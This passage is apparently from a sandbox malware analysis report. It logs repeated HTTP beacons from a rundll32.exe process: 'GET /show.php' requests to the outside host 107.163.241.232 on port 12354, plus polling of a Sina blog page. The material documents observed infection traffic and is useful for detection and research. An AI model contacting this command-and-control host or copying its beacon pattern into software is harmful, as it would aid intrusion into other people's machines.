                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:02.611855030 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              110 | 192.168.2.4 | 51468 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:03.331675053 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              111 | 192.168.2.4 | 51478 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:03.447772026 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              112 | 192.168.2.4 | 51568 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:04.991905928 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              113 | 192.168.2.4 | 51576 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:05.107765913 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:06.663619995 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              114 | 192.168.2.4 | 51577 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:05.108432055 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              115 | 192.168.2.4 | 51658 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:07.231511116 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              116 | 192.168.2.4 | 51666 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:07.348721027 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              117 | 192.168.2.4 | 51739 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:09.098010063 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              118 | 192.168.2.4 | 51741 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:09.208740950 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              119 | 192.168.2.4 | 51742 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:09.211011887 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:10.782651901 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              120 | 192.168.2.4 | 52288 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:11.346539021 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              121 | 192.168.2.4 | 52374 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:11.462119102 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              122 | 192.168.2.4 | 53686 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:13.100939989 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              123 | 192.168.2.4 | 53818 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:13.215796947 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              124 | 192.168.2.4 | 53820 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:13.216111898 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:14.781997919 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              125 | 192.168.2.4 | 55654 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:15.378324986 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              126 | 192.168.2.4 | 55673 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:15.689882040 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              127 | 192.168.2.4 | 56252 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:17.115521908 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              128 | 192.168.2.4 | 56357 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:17.229372978 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:18.799427032 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              129 | 192.168.2.4 | 56358 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:17.232209921 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              130 | 192.168.2.4 | 57170 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:19.355490923 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              131 | 192.168.2.4 | 57220 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:19.481911898 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              132 | 192.168.2.4 | 58813 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:21.131328106 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              133 | 192.168.2.4 | 58979 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:21.252327919 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              134 | 192.168.2.4 | 58981 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:21.252428055 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:22.830583096 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              135 | 192.168.2.4 | 60535 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:23.361043930 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              136 | 192.168.2.4 | 60620 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:23.484586000 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              137 | 192.168.2.4 | 62056 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:24.931222916 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              138 | 192.168.2.4 | 62221 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:25.161228895 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              139 | 192.168.2.4 | 62240 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:25.276005030 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              140 | 192.168.2.4 | 62241 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:25.276731014 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:26.836364031 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              141 | 192.168.2.4 | 64094 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:27.389686108 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              142 | 192.168.2.4 | 64295 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:27.516988993 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              143 | 192.168.2.4 | 49293 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:28.825407028 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              144 | 192.168.2.4 | 49297 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:29.268208027 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              145 | 192.168.2.4 | 49302 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:29.553390980 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              146 | 192.168.2.4 | 49303 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:29.553591967 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:31.043132067 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              147 | 192.168.2.4 | 51032 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:31.752629995 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              148 | 192.168.2.4 | 51043 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:31.995491982 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              149 | 192.168.2.4 | 51361 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:32.977711916 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.4 | 49854 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:24:48 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              2024-12-11 15:24:49 UTC | 846 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 11 Dec 2024 15:24:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 325
                                              Connection: close
                                              Set-Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; path=/; expires=Sat, 09-Dec-34 15:24:48 GMT; domain=.sina.com.cn
                                              Set-Cookie: U_TRS2=0000001f.32a12510.6759aec0.40768b16; path=/; domain=.sina.com.cn
                                              Origin-Agent-Cluster: ?0
                                              P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Expires: Wed, 11 Dec 2024 15:24:47 GMT
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              DPOOL_HEADER: 10.13.3.117
                                              strict-transport-security: max-age=180
                                              Content-Security-Policy: upgrade-insecure-requests
                                              X-Cache: MISS from 464291b26ee9
                                              Content-Security-Policy: upgrade-insecure-requests
                                              X-Via-SSL: ssl.30.sinag1.bx.lb.sinanode.com
                                              2024-12-11 15:24:49 UTC | 325 | IN
                                              Data Ascii: <meta http-equiv="Expires" CONTENT="-1" ><meta http-equiv="Cache-Control" CONTENT="no-cache" ><meta http-equiv="Cache-Control" CONTENT="no-store" ><meta http-equiv="Pragma" CONTENT="no-cache" ><script>window.location.href='//control.blog.sina.com.cn/my


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49927 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:24:56 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49963 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:00 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
